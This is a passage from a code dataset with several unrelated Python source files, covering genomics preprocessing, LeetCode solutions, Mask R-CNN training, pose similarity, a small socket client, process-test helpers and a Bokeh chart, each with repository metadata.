one_hot[idxs, np.arange(num_bases)] = 1\n return one_hot\n\n\ndef augment(seq):\n shift = 0\n pad_char = 'A'\n while shift == 0:\n shift = random.randint(-50, 50)\n if shift < 0:\n aug_seq = abs(shift) * pad_char + seq[:len(seq) - abs(shift)]\n else:\n aug_seq = seq[shift:] + abs(shift) * pad_char\n return aug_seq\n\n\nimport pandas as pd\ndf = pd.read_csv(labels_path, sep='\\t', header=None)\ndf = df[df.columns[3:]]\nlabel_mat = df.as_matrix()\nlabel_mat = label_mat.astype(int)\n\n\nprint('converting positives...')\nsamples = []\nheaders = []\nlabels = []\nc = 0\nd = dict()\nfor header, seq in middle_subseqs(path_in_positive):\n samples.append(dna_to_one_hot(seq))\n headers.append(header)\n labels.append(label_mat[c])\n\n rev_comp_seq = rev_comp(seq)\n samples.append(dna_to_one_hot(rev_comp_seq))\n headers.append(header + ' - revcomp')\n labels.append(label_mat[c])\n\n # aug_seq = augment(seq)\n # samples.append(dna_to_one_hot(aug_seq))\n # headers.append(header + ' - augmented')\n # labels.append(label_mat[c])\n #\n # rev_comp_aug_seq = rev_comp(aug_seq)\n # samples.append(dna_to_one_hot(rev_comp_aug_seq))\n # headers.append(header + ' - revcomp+augmented')\n # labels.append(label_mat[c])\n\n if c % 1000 == 0:\n print(c)\n c += 1\n\n\nprint('number of positives (incl. rev-comps): ', len(samples))\n\n# print('converting negatives...')\n# c = 0\n\n# neg_samples = []\n# for header, seq in all_subseqs(path_in_negative):\n# for header, seq in middle_subseqs(path_in_negative):\n# samples.append(dna_to_one_hot(seq))\n# headers.append(header)\n# labels.append(np.zeros(27))\n#\n# rev_comp_seq = rev_comp(seq)\n# samples.append(dna_to_one_hot(rev_comp_seq))\n# headers.append(header + ' - revcomp')\n# labels.append(np.zeros(27))\n#\n# aug_seq = augment(seq)\n# samples.append(dna_to_one_hot(aug_seq))\n# headers.append(header + ' - augmented')\n# labels.append(np.zeros(27))\n#\n# rev_comp_aug_seq = rev_comp(aug_seq)\n# samples.append(dna_to_one_hot(rev_comp_aug_seq))\n# headers.append(header + ' - revcomp+augmented')\n# labels.append(np.zeros(27))\n# c += 1\n# if c % 1000 == 0:\n# print(c)\n#\n# if c > 30000:\n# break\n\n# print('number of negatives: ', len(neg_samples))\n#\n# ##################### MULTI-CLASS #########################\n#\n# # samples.extend(neg_samples)\nsamples_stacked = np.stack(samples)\nlabels = np.array(labels)\nheaders = np.array(headers)\n###########################################################\n\n\n# pos_labels = np.ones((len(samples), 1), dtype=bool)\n# neg_labels = np.zeros((len(neg_samples), 1), dtype=bool)\n# labels = np.vstack((pos_labels, neg_labels))\n# samples.extend(neg_samples)\n# samples_stacked = np.stack(samples)\n# headers = np.array(headers)\n\n# shuffle\nidxs = np.arange(len(samples_stacked))\nperm = np.random.permutation(idxs)\nlabels = labels[perm]\nsamples_stacked = samples_stacked[perm]\nheaders = headers[perm]\n\n# divide\n# train_index, validation_index, test_index = np.split(perm, [int(.8*len(perm)), int(0.85*len(perm))])\n\ntrain_index = []\nvalidation_index = []\ntest_index = []\n\nfor i, header in enumerate(headers):\n if 'chr6' in header or 'chr7' in header:\n validation_index.append(i)\n elif 'chr8' in header or 'chr9' in header:\n test_index.append(i)\n else:\n train_index.append(i)\n\n# # compress\n#\n# # for (idxs, name) in zip((train_index, validation_index, test_index), ('train', 'validation', 'test')):\n# # Xr = np.reshape(samples_stacked[idxs], 4*1000*len(idxs))\n# # Xb = np.packbits(Xr)\n# # np.save('X_bin_' + name, Xb)\n# #\n# # Yr = 
np.reshape(labels[idxs], 27*len(idxs))\n# # Yb = np.packbits(Yr)\n# # np.save('Y_bin_' + name, Yb)\n# #\n# # np.save('headers_' + name, headers[idxs])\n#\nfor (idxs, name) in zip((train_index, validation_index, test_index), ('train', 'validation', 'test')):\n    np.save(os.path.join(path_out, 'X_' + name), samples_stacked[idxs])\n    np.save(os.path.join(path_out, 'Y_' + name), labels[idxs])\n    np.save(os.path.join(path_out, 'headers_' + name), headers[idxs])\n\nprint('after save')\n#\n# # np.save(path_out, samples)\n# np.save(os.path.join(path_out, 'X_windows'), samples_stacked)\n","repo_name":"pazbunis/seq2dataset","sub_path":"seq2simple_classification.py","file_name":"seq2simple_classification.py","file_ext":"py","file_size_in_byte":7754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"817016779","text":"# Given two strings s and t, return true if s is a subsequence of t, or false otherwise.\n#\n# A subsequence of a string is a new string that is formed from the original string by deleting\n# some (can be none) of the characters without disturbing the relative\n# positions of the remaining characters. (i.e., \"ace\" is a subsequence of \"abcde\" while \"aec\" is not).\n# idea: two pointers traverse t once; advance the pointer into s on each match,\n# then s is a subsequence of t iff every character of s was consumed\nclass Solution:\n    def isSubsequence(self, s: str, t: str) -> bool:\n        i = 0\n        j = 0\n        while i < len(t) and j < len(s):\n            if t[i] == s[j]:\n                j = j + 1\n            i = i + 1\n        # an empty s also lands here with j == 0 == len(s), i.e. True\n        return j == len(s)\n\n\ns = Solution()\nresult = s.isSubsequence('ahmad', 'achmkakuddpppo')  # True\n\nprint(result)\n","repo_name":"ahmaddroobi99/ProblemSolving","sub_path":"IsSubsequent.py","file_name":"IsSubsequent.py","file_ext":"py","file_size_in_byte":995,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
+{"seq_id":"4939323417","text":"\"\"\"\nImport x-ray image data using the dxtbx machinery\n\"\"\"\n\n#<--- LEFT OFF HERE --->\n\nimport argparse\n\nimport numpy as np\n\nfrom mdx2.data import ImageSeries\nfrom mdx2.dxtbx_machinery import ImageSet\nfrom mdx2.utils import saveobj\n\ndef parse_arguments():\n    \"\"\"Parse commandline arguments\"\"\"\n\n    parser = argparse.ArgumentParser(\n        description=__doc__,\n        formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n    )\n\n    # Required arguments\n    parser.add_argument(\"expt\", help=\"experiments file, such as from dials.import\")\n    parser.add_argument(\"--outfile\", default=\"data.nxs\", help=\"name of the output NeXus file\")\n    parser.add_argument(\"--chunks\", nargs=3, type=int, metavar='N', help=\"chunking for compression (frames, y, x)\")\n\n    return parser\n\ndef run(args=None):\n    parser = parse_arguments()\n    args = parser.parse_args(args)\n\n    exptfile = args.expt\n\n    image_series = ImageSeries.from_expt(exptfile)\n    iset = ImageSet.from_file(exptfile)\n\n    if args.chunks is not None:\n        image_series.data.chunks=tuple(args.chunks)\n\n    nxs = saveobj(image_series,args.outfile,name='image_series')\n\n    iset.read_all(image_series.data,image_series.data.chunks[0])\n\n    print(\"done!\")\n\nif __name__ == \"__main__\":\n    run()\n","repo_name":"ando-lab/mdx2","sub_path":"mdx2/command_line/import_data.py","file_name":"import_data.py","file_ext":"py","file_size_in_byte":1249,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"}
+{"seq_id":"14136990252","text":"import numpy as np\r\nfrom posetwister.utils import load_json\r\n\r\nkeypoints_names = [\"nose\", \"left_eye\", \"right_eye\", \"left_ear\", \"right_ear\", \"left_shoulder\",\r\n \"right_shoulder\", \"left_elbow\", \"right_elbow\", \"left_wrist\", \"right_wrist\",\r\n \"left_hip\", \"right_hip\", \"left_knee\", \"right_knee\", \"left_ankle\", \"right_ankle\"]\r\nkeypoints_ids = {n: i for i, n in enumerate(keypoints_names)}\r\n\r\n\r\ndef angle(vect1, vect2):\r\n return np.degrees(np.arccos(np.dot(vect1, vect2) / (\r\n np.linalg.norm(vect1) * np.linalg.norm(vect2))))\r\n\r\n\r\ndef get_angles(reference_keypoints):\r\n point_lsh = reference_keypoints[keypoints_ids['left_shoulder']][:2]\r\n point_rsh = reference_keypoints[keypoints_ids['right_shoulder']][:2]\r\n point_lhip = reference_keypoints[keypoints_ids['left_hip']][:2]\r\n point_rhip = reference_keypoints[keypoints_ids['right_hip']][:2]\r\n point_lelb = reference_keypoints[keypoints_ids['left_elbow']][:2]\r\n point_relb = reference_keypoints[keypoints_ids['right_elbow']][:2]\r\n point_lwr = reference_keypoints[keypoints_ids['left_wrist']][:2]\r\n point_rwr = reference_keypoints[keypoints_ids['right_wrist']][:2]\r\n point_lkn = reference_keypoints[keypoints_ids['left_knee']][:2]\r\n point_rkn = reference_keypoints[keypoints_ids['right_knee']][:2]\r\n point_lank = reference_keypoints[keypoints_ids['left_ankle']][:2]\r\n point_rank = reference_keypoints[keypoints_ids['right_ankle']][:2]\r\n\r\n torso = np.mean([point_lsh, point_rsh], axis=0)\r\n hips = np.mean([point_lhip, point_rhip], axis=0)\r\n vect_body = [n - m for (n, m) in zip(torso, hips)]\r\n\r\n vect_left_arm = [n - m for (n, m) in zip(point_lelb, point_lsh)]\r\n vect_left_wrist = [n - m for (n, m) in zip(point_lwr, point_lelb)]\r\n vect_left_knee = [n - m for (n, m) in zip(point_lkn, point_lhip)]\r\n vect_left_ankle = [n - m for (n, m) in zip(point_lank, point_lkn)]\r\n\r\n vect_right_arm = [n - m for (n, m) in zip(point_relb, point_rsh)]\r\n vect_right_wrist = [n - m for (n, m) in zip(point_rwr, point_relb)]\r\n vect_right_knee = [n - m for (n, m) in zip(point_rkn, point_rhip)]\r\n vect_right_ankle = [n - m for (n, m) in zip(point_rank, point_rkn)]\r\n\r\n angle_lsh = angle(vect_left_arm, vect_body)\r\n angle_lelb = angle(vect_left_wrist, vect_left_arm)\r\n angle_lhip = angle(vect_left_knee, vect_body)\r\n angle_lkne = angle(vect_left_ankle, vect_left_knee)\r\n angle_rsh = angle(vect_right_arm, vect_body)\r\n angle_relb = angle(vect_right_wrist, vect_right_arm)\r\n angle_rhip = angle(vect_right_knee, vect_body)\r\n angle_rkne = angle(vect_right_ankle, vect_right_knee)\r\n angles = [angle_lsh, angle_rsh, angle_lelb, angle_relb, angle_lhip, angle_rhip, angle_lkne, angle_rkne]\r\n return angles\r\n\r\n\r\ndef compute_similarity(keypoints, reference_keypoints):\r\n ref_angles = get_angles(reference_keypoints)\r\n cand_angles = get_angles(keypoints)\r\n return np.sum(np.abs([n - m for (n, m) in zip(ref_angles, cand_angles)]))\r\n\r\n\r\nref_pose0 = load_json(\"/home/strakajk/MLProjects/PoseTwister/data/ref_poses/t_pose-0.json\")\r\nref_pose1 = load_json(\"/home/strakajk/MLProjects/PoseTwister/data/ref_poses/t_pose-1.json\")\r\nref_pose2 = load_json(\"/home/strakajk/MLProjects/PoseTwister/data/ref_poses/t_pose-2.json\")\r\nkeypoints0 = ref_pose0[\"keypoints\"][0]\r\nkeypoints1 = ref_pose1[\"keypoints\"][0]\r\nkeypoints2 = ref_pose2[\"keypoints\"][0]\r\n\r\nsimilarity = compute_similarity(keypoints0, keypoints1)\r\nprint(similarity)\r\n\r\nsimilarity = 
compute_similarity(keypoints0, keypoints2)\r\nprint(similarity)\r\n\r\nsimilarity = compute_similarity(keypoints1, keypoints2)\r\nprint(similarity)\r\n","repo_name":"strakaj/PoseTwister","sub_path":"pose_predictions.py","file_name":"pose_predictions.py","file_ext":"py","file_size_in_byte":3635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14450563547","text":"from controller.token import (\n Token,\n TokenType\n)\n\nfrom model.Operation import Operation\nfrom model.Configuration import Configuration\n\noperationList = []\nconfigurationSettings: Configuration = Configuration()\n\ndef start_evaluate(tokens_input = [], prevOperation = None) -> Operation:\n \n index: int = 0\n tokens = tokens_input\n\n currentOperation = Operation(fatherOperation=prevOperation)\n \n while len(tokens):\n token: Token = tokens.pop(0)\n \n if token.getType() == TokenType.RBRACE:\n if currentOperation.fatherOperation is None:\n operationList.append(currentOperation)\n return start_evaluate(tokens, None)\n \n if token.getType() == TokenType.RBRACKET:\n \n if currentOperation.operation is None:\n while len(tokens):\n token: Token = tokens.pop(0)\n if token.getType() == TokenType.LETTER and token.getLiteral() =='\"texto\"':\n title: str = tokens[1].getLiteral()\n title: str = title.replace('\"', '')\n configurationSettings.title = title\n\n if token.getType() == TokenType.LETTER and token.getLiteral() =='\"fondo\"':\n backgroundColor: str = tokens[1].getLiteral()\n backgroundColor: str = backgroundColor.replace('\"', '')\n configurationSettings.backgroundColor = backgroundColor\n\n if token.getType() == TokenType.LETTER and token.getLiteral() =='\"fuente\"':\n fontStyle: str = tokens[1].getLiteral()\n fontStyle: str = fontStyle.replace('\"', '')\n configurationSettings.fontStyle = fontStyle\n\n if token.getType() == TokenType.LETTER and token.getLiteral() =='\"forma\"':\n style: str = tokens[1].getLiteral()\n style: str = style.replace('\"', '')\n configurationSettings.style = style\n pass\n \n return currentOperation\n \n if token.getType() == TokenType.LETTER and token.getLiteral() =='\"operacion\"':\n res: str = tokens[1].getLiteral()\n res: str = res.replace('\"', '')\n currentOperation.operation = res\n \n if token.getType() == TokenType.LETTER and token.getLiteral() == '\"valor1\"':\n valueToken: Token = tokens[1]\n \n if valueToken.getType() == TokenType.NUMBER:\n currentOperation.value1 = float(valueToken.getLiteral())\n else:\n currentOperation.value1 = start_evaluate(tokens, currentOperation)\n \n if token.getType() == TokenType.LETTER and token.getLiteral() == '\"valor2\"':\n valueToken: Token = tokens[1]\n \n if valueToken.getType() == TokenType.NUMBER:\n currentOperation.value2 = float(valueToken.getLiteral())\n else:\n currentOperation.value2 = start_evaluate(tokens, currentOperation)\n \n index += 1\n \n return currentOperation","repo_name":"Fernando-Ibarra/LFP_S2_2023_Proyecto1_202110531","sub_path":"controller/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9181910805","text":"import os\nimport sys\nimport matplotlib.pyplot as plt\n\nsys.path.insert(0, '../libraries')\nfrom mrcnn.config import Config\nimport mrcnn.utils as utils\nimport mrcnn.model as modellib\nfrom mrcnn.model import log\nimport mcoco.coco as coco\n\n\n# HOME_DIR is the path that the project you put on\nHOME_DIR = 
'.../current-lane-drivable-master'\nDATA_DIR = os.path.join(HOME_DIR, \"data/drivable\")\nprint(DATA_DIR)\nWEIGHTS_DIR = os.path.join(HOME_DIR, \"data/weights\")\nprint(WEIGHTS_DIR)\nMODEL_DIR = os.path.join(DATA_DIR, \"logs\")\nprint(MODEL_DIR)\n\n# Local path to trained weights file\nDRIVABLE_MODEL_PATH = os.path.join(WEIGHTS_DIR, \"mask_rcnn_drivable_res50.h5\")\n# Download COCO trained weights from Releases if needed\n# if not os.path.exists(COCO_MODEL_PATH):\n# utils.download_trained_weights(COCO_MODEL_PATH)\n\n\ndef get_ax(rows=1, cols=1, size=8):\n \"\"\"Return a Matplotlib Axes array to be used in\n all visualizations in the notebook. Provide a\n central point to control graph sizes.\n\n Change the default size attribute to control the size\n of rendered images\n \"\"\"\n _, ax = plt.subplots(rows, cols, figsize=(size * cols, size * rows))\n return ax\n\ndataset_train = coco.CocoDataset()\ndataset_train.load_coco(DATA_DIR, subset=\"drivable_train\", year=\"2019\")\ndataset_train.prepare()\n\ndataset_validate = coco.CocoDataset()\ndataset_validate.load_coco(DATA_DIR, subset=\"drivable_validate\", year=\"2019\")\ndataset_validate.prepare()\n\ndataset_test = coco.CocoDataset()\ndataset_test.load_coco(DATA_DIR, subset=\"drivable_test\", year=\"2019\")\ndataset_test.prepare()\n\n\n# change from coco config\nclass ShapesConfig(Config):\n \"\"\"Configuration for training on the shapes dataset.\n \"\"\"\n NAME = \"drivable\"\n\n #choose backbone\n BACKBONE = \"resnet50\"\n\n # Train on 1 GPU and 2 images per GPU. Put multiple images on each\n # GPU if the images are small. Batch size is 2 (GPUs * images/GPU).\n GPU_COUNT = 1\n IMAGES_PER_GPU = 1\n\n # Number of classes (including background)\n NUM_CLASSES = 1 + 1 # background + 1(drivable)\n\n # # Use smaller images for faster training.\n IMAGE_MAX_DIM = 1024\n IMAGE_MIN_DIM = 512\n IMAGE_RESIZE_MODE = \"square\"\n\n # # Use smaller anchors because our image and objects are small\n # RPN_ANCHOR_SCALES = rpn_anchor_scales\n\n # # Aim to allow ROI sampling to pick 33% positive ROIs.\n TRAIN_ROIS_PER_IMAGE = 128\n\n STEPS_PER_EPOCH = 1000\n\n VALIDATION_STEPS = 50\n POST_NMS_ROIS_INFERENCE = 512\n\n # Loss weights for more precise optimization.\n # Can be used for R-CNN training setup.\n LOSS_WEIGHTS = {\n \"rpn_class_loss\": 1.,\n \"rpn_bbox_loss\": 1.,\n \"mrcnn_class_loss\": 1.,\n \"mrcnn_bbox_loss\": 1.,\n \"mrcnn_mask_loss\": 1.\n }\n\nconfig = ShapesConfig()\nconfig.display()\n\nmodel = modellib.MaskRCNN(mode=\"training\", config=config, model_dir=MODEL_DIR)\n\n# inititalize_weights_with = \"coco\" # imagenet, coco, or last\n# if inititalize_weights_with == \"imagenet\":\n# model.load_weights(model.get_imagenet_weights(), by_name=True)\n#\n# elif inititalize_weights_with == \"coco\":\n# model.load_weights(COCO_MODEL_PATH, by_name=True,\n# exclude=[\"mrcnn_class_logits\", \"mrcnn_bbox_fc\",\n# \"mrcnn_bbox\", \"mrcnn_mask\"])\n#\n# elif inititalize_weights_with == \"last\":\n# Load the last model you trained and continue training\n# model.load_weights(model.find_last()[1], by_name=True)\n\nmodel.load_weights(DRIVABLE_MODEL_PATH, by_name=True,\n exclude=[\"mrcnn_class_logits\", \"mrcnn_bbox_fc\",\n \"mrcnn_bbox\", \"mrcnn_mask\"])\n\nmodel.train(dataset_train, dataset_validate,\n learning_rate=config.LEARNING_RATE,\n epochs=4,\n layers='heads')\nmodel.train(dataset_train, dataset_validate,\n learning_rate=config.LEARNING_RATE,\n epochs=12,\n layers='4+')\n\nmodel.train(dataset_train, dataset_validate,\n learning_rate=config.LEARNING_RATE 
/ 10,\n epochs=16, # epochs is cumulative in model.train, so this stage trains 4 additional epochs\n layers=\"all\")\n\n######################################\n# Add augmentation #\n######################################\n# # Training - Stage 1\n# print(\"Training network heads\")\n# model.train(dataset_train, dataset_val,\n# learning_rate=config.LEARNING_RATE,\n# epochs=40,\n# layers='heads',\n# augmentation=augmentation)\n#\n# # Training - Stage 2\n# # Finetune layers from ResNet stage 4 and up\n# print(\"Fine tune Resnet stage 4 and up\")\n# model.train(dataset_train, dataset_val,\n# learning_rate=config.LEARNING_RATE,\n# epochs=120,\n# layers='4+',\n# augmentation=augmentation)\n#\n# # Training - Stage 3\n# # Fine tune all layers\n# print(\"Fine tune all layers\")\n# model.train(dataset_train, dataset_val,\n# learning_rate=config.LEARNING_RATE / 10,\n# epochs=160,\n# layers='all',\n# augmentation=augmentation)","repo_name":"pandamax/current-lane-drivable","sub_path":"mask-rcnn/notebooks/mask_rcnn_drivable.py","file_name":"mask_rcnn_drivable.py","file_ext":"py","file_size_in_byte":5076,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"}
+{"seq_id":"37818687606","text":"'''\nAlgorithm of Insertion Sort:\n\nInsertion sort iterates, consuming one input element each repetition, and growing a sorted output list.\nAt each iteration, insertion sort removes one element from the input data, finds the location it belongs within the sorted list, and inserts it there.\nIt repeats until no input elements remain.\n\n'''\n\n\nclass Solution:\n def insertionSortList(self, head: ListNode) -> ListNode:\n j = []\n \n k = head\n \n \n while k:\n j.append(k.val)\n k = k.next\n \n j.sort()\n\n \n head = ListNode(0)\n ptr = head\n \n \n for i in j:\n newNode = ListNode(i)\n ptr.next = newNode\n ptr = ptr.next\n \n return head.next\n","repo_name":"yashagrawal300/python-programs","sub_path":"Leetcode/November challenge/Insertion Sort List.py","file_name":"Insertion Sort List.py","file_ext":"py","file_size_in_byte":801,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"72"}
+{"seq_id":"15646195822","text":"import socket\n\ndef init_server(server_address):\n socket_server=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n\n try:\n print(\"[*] Client is trying to connect at {}:{}\".format(server_address[0], server_address[1]))\n socket_server.connect(server_address)\n except socket.error as serr:\n print(\"unable to connect {}\".format(serr))\n socket_server.close()\n return\n\n print(\"[*] Client has successfully connected at {}:{}\".format(server_address[0],server_address[1]))\n\n recv_all(socket_server)\n\ndef recv_all(socket_server):\n MAX_RECV=1024\n command = input(\"type: \")\n try:\n while command:\n\n socket_server.send(command.encode(\"utf-8\"))\n\n data=socket_server.recv(MAX_RECV).decode('utf-8')\n print(\"{} \\n\".format(data))\n\n command=input(\"$~\")\n data=\"\"\n\n except KeyboardInterrupt:\n print(\"[*] You left this server\")\n\nif __name__==\"__main__\":\n init_server((\"10.10.2.223\",8080))","repo_name":"PalagesiuCezar/Networking","sub_path":"Telnet/Telnet_client.py","file_name":"Telnet_client.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"475782300","text":"import os\nimport signal\nimport sys\n\ntry:\n import subprocess\nexcept ImportError:\n HAVE_SUBPROCESS = False\n import popen2\n import select\nelse:\n HAVE_SUBPROCESS = 
True\n\n\n__all__ = ['APP32', 'APP64', 'pscmd', 'TestApp']\n\n\ndef can_run(file):\n \"\"\"Check if we can run a test application\n\n Returns the filename if so, False otherwise.\n \"\"\"\n if not os.path.exists(file):\n return False\n if HAVE_SUBPROCESS:\n try:\n p = subprocess.Popen([file], stdout=subprocess.PIPE)\n p.stdout.read(1)\n except OSError:\n pass\n else:\n os.kill(p.pid, signal.SIGTERM)\n p.wait()\n return file\n else:\n p = popen2.Popen3(file, True)\n rlist, wlist, xlist = select.select([p.fromchild, p.childerr], [], [])\n if p.poll() == -1:\n os.kill(p.pid, signal.SIGTERM)\n p.wait()\n stdout = p.fromchild.read()\n stderr = p.childerr.read()\n if stdout:\n return file\n# sys.stdout.write('%s not runnable, some tests will be skipped'\n# % os.path.basename(file))\n return False\n\n\nAPP32 = can_run(os.path.join(os.path.dirname(__file__), 'app32'))\nAPP64 = can_run(os.path.join(os.path.dirname(__file__), 'app64'))\n\n\ndef run(cmd):\n \"\"\"Invoke a command, return stdout\n\n This is a small helper that runs on all supported Python versions.\n `cmd` is a list of the command line arguments.\n \"\"\"\n if HAVE_SUBPROCESS:\n val = subprocess.Popen(cmd, stdout=subprocess.PIPE).communicate()[0]\n else:\n val = os.popen(' '.join(cmd)).read()\n val = val.decode()\n return val.strip()\n\n\n# Find the ps command.\nif os.path.exists('/bin/ps'):\n PSCMD = '/bin/ps'\nelif os.path.exists('/usr/bin/ps'):\n PSCMD = '/usr/bin/ps'\nelse:\n PSCMD = None\n\n\ndef pscmd(item, pid=os.getpid()):\n \"\"\"Invoke ps -o %(item)s -p %(pid)d and return the result\"\"\"\n pscmd = PSCMD\n if item == 'sid' and os.uname()[0] == 'AIX':\n pscmd = '/usr/sysv/bin/ps'\n if item == 'sid' and os.uname()[0] == 'Darwin':\n item = 'sess'\n assert pscmd, 'ps command not found (%s), can not run test' % pscmd\n if item == 'ni' and os.uname()[0] == 'SunOS':\n item = 'nice'\n if item == 'rssize' and os.uname()[0] in ['SunOS', 'Darwin']:\n item = 'rss'\n if item == 'pgrp' and os.uname()[0] in ['SunOS', 'AIX', 'Darwin']:\n item = 'pgid'\n cmdl = [pscmd, '-o', item, '-p', str(pid)]\n if HAVE_SUBPROCESS:\n val = subprocess.Popen(cmdl, stdout=subprocess.PIPE).communicate()[0]\n else:\n val = os.popen(' '.join(cmdl)).read()\n val = val.decode()\n val = val.strip().split()[-1]\n if item == 'sess' and os.uname()[0] == 'Darwin':\n # 'ps -o sess' on Darwin returns a hex value\n val = int(val, 16)\n return val\n\n\nclass TestApp:\n \"\"\"Simple class to run test apps as subprocesses\n\n This will work on all supported python versions (as opposed to the\n subprocess module). 
It will also ensure that the process is\n actually running when the constructor returns.\n \"\"\"\n def __init__(self, args, env=None):\n \"\"\"Create the instance\n\n args:: Argument list as a Python list.\n env:: Environment to run in.\n \"\"\"\n self.args = args\n self.env = env\n self.pid = None\n if HAVE_SUBPROCESS:\n self.app = self._run_subprocess()\n else:\n self.app = self._run_fork()\n\n def kill(self):\n \"\"\"Kill the process\n\n Calling this more then once or on an already killed process\n does not do any harm.\n \"\"\"\n self.kill_to_zombie()\n self.wait()\n\n def kill_to_zombie(self):\n \"\"\"Kill the process, leaving it in a zombie state\n\n This does not guarantee the process is in zombie state, it\n might have been waited on somewhere else.\n \"\"\"\n try:\n os.kill(self.pid, signal.SIGTERM)\n except OSError:\n e = sys.exc_info()[1]\n if not e.errno == 3:\n raise\n\n def wait(self):\n \"\"\"Wait for the process\n\n If the process in no longer waitable, i.e. does no longer\n exist, this will return immediately.\n \"\"\"\n try:\n if hasattr(self.app, 'wait'):\n self.app.wait()\n else:\n os.waitpid(self.pid, 0)\n except OSError:\n e = sys.exc_info()[1]\n if not e.errno == 10:\n raise\n self.pid = None\n\n def _run_subprocess(self):\n app = subprocess.Popen(self.args, env=self.env, stdout=subprocess.PIPE)\n self.pid = app.pid\n app.stdout.read(1)\n return app\n\n def _run_fork(self):\n # Based on popen2.Popen3 but simplified.\n try:\n MAXFD = os.sysconf('SC_OPEN_MAX')\n except (AttributeError, ValueError):\n MAXFD = 256\n c2pread, c2pwrite = os.pipe()\n pid = os.fork()\n if pid == 0: # child\n os.dup2(c2pwrite, 1)\n for i in xrange(3, MAXFD):\n try:\n os.close(i)\n except OSError:\n pass\n try:\n if self.env is not None:\n os.execve(self.args[0], self.args, self.env)\n else:\n os.execv(self.args[0], self.args)\n finally:\n os._exit(1)\n else: # parent\n self.pid = pid\n os.close(c2pwrite)\n fromchild = os.fdopen(c2pread, 'r')\n fromchild.read(1)\n return None\n","repo_name":"apache/hawq","sub_path":"tools/bin/pythonSrc/PSI-0.3b2_gp/tests/apphelper.py","file_name":"apphelper.py","file_ext":"py","file_size_in_byte":5664,"program_lang":"python","lang":"en","doc_type":"code","stars":690,"dataset":"github-code","pt":"72"} +{"seq_id":"27241381649","text":"import pandas as pd\n\nfrom bokeh.plotting import figure\nfrom bokeh.io import curdoc\nfrom bokeh.layouts import row\n\ndef update_chart(attr, old, new):\n print(old)\n print(new)\n conAmnt = my_contrib.groupby([mySelect.value])['AMNT'].sum()\n \n # update x_axis of the chart\n my_bar.x_range,factors = list(conAmnt.index.values)\n \n # update columndatasource with new data\n my_cds.data = dict(c_type=conAmnt.index.values,\n tot_amt=conAmnt.values)\n \n \n# read the datafile into a dataframe\nmy_contrib = pd.read_excel('data/2017_Contributions.xlsx')\n\n# needs these for hover tools and most othet bokeh chart functionality\nfrom bokeh.models import HoverTool,ColumnDataSource,NumeralTickFormatter, Select\n\n# Add Select Widget\nmySelect = Select(title=\"summurize contributions by:\",options=['OFFICECD','C_CODE','BOROUGHCD'], value='OFFICECD')\n\n# create a groupby to analyze funds raised by contributor type\nconAmnt = my_contrib.groupby([mySelect.value])['AMNT'].sum()\n\nx_val = conAmnt.index.values\ny_val = conAmnt.values\n\n# Create a columndatasource object\nmy_cds = ColumnDataSource(data=dict(\n c_type = x_val,\n tot_amt = y_val\n))\n\n# Create Hovertool with tooltips\nmyHover = HoverTool(tooltips = [\n (\"Amnt 
Raised:\",\"@tot_amt{$0,0.00 a}\") \r\n])\r\n\r\n# Create a figure object with necessary parameter\r\nmy_bar = figure(x_range=x_val,\r\n width=600,height=400,\r\n x_axis_label = \"Types of contributors\", y_axis_label = \"Funds raised in $\",\r\n title = \"Analyzing contributions by contributor type\",\r\n\r\n tools = 'xpan,zoom_in,tap')\r\n\r\n# Bar chart should use columnDataSource as its source for data\r\nmy_bar.vbar(x='c_type', top='tot_amt', width=0.5, color='red',source=my_cds,\r\n selection_color='blue',\r\n nonselection_color = 'green', nonselection_alpha=0.2)\r\n\r\n\r\nmy_bar.yaxis.formatter = NumeralTickFormatter(format='$0,0 a')\r\n\r\n# Add the hoverTool to the plot figure\r\nmy_bar.add_tools(myHover)\r\n\r\n# Capture Select on_change event\r\nmySelect.on_change('value',update_chart)\r\n\r\n\r\n# Show the bar charts and Select widget\r\ncurdoc().add_root(row(mySelect,my_bar))\r\n\r\n# Add title to the server application\r\ncurdoc().title=\"My First BokehServer Chart\"\r\n","repo_name":"heekyungkim-tech/Visualization_Python","sub_path":"Barchart_Server_Chart_SelectWidget.py","file_name":"Barchart_Server_Chart_SelectWidget.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"74106467432","text":"\"\"\"\nRecurrent Neural Network\n\nCreates python object which stores tensorflow graph.\nMakes a simple multilayer RNN, with mapping from inputs \nto hidden layers. Currently outputs just the final set of prices.\n\nBased on object oriented framework used in CS 224,\nand A. Geron's \"Hands on Machine Learning with Scikit-Learn and\nTensorflow\" Ch 14 on RNN. \nCheck those out, I stole pretty liberally from Geron.\nThe tensorflow docs are pretty rough, but the tutorials are almost\nreadable. \n\nThe input (X), and target (y) placeholders are defined in add_placeholders.\nThese are inputs to the TF graph.\n\nBefore the network can be run it should be built, which defines the graph.\n\nThe guts of the network are defined in add_prediction_op, which\nhas an input/output hidden layer to reduce dimension. \nThere is then a multilayer, dynamic RNN inside.\nThis is all defined with tensorflow intrinsics/added modules.\nCurrently, I've turned off the dropout, which should only be active\nduring training. \n\nThe training is done with batch gradient descent optimization\nvia the Adam optimizer, which is an improved gradient descent\n(it scales gradients and includes a momentum variable).\nNote that tensorflow handles backpropagation automatically. 
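\n\nAs a minimal sketch (this simply mirrors add_training_op defined below), the\ntraining op amounts to:\n\n optimizer = tf.train.AdamOptimizer(learning_rate=self.lr)\n train_op = optimizer.minimize(loss) # TF computes the gradients automatically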
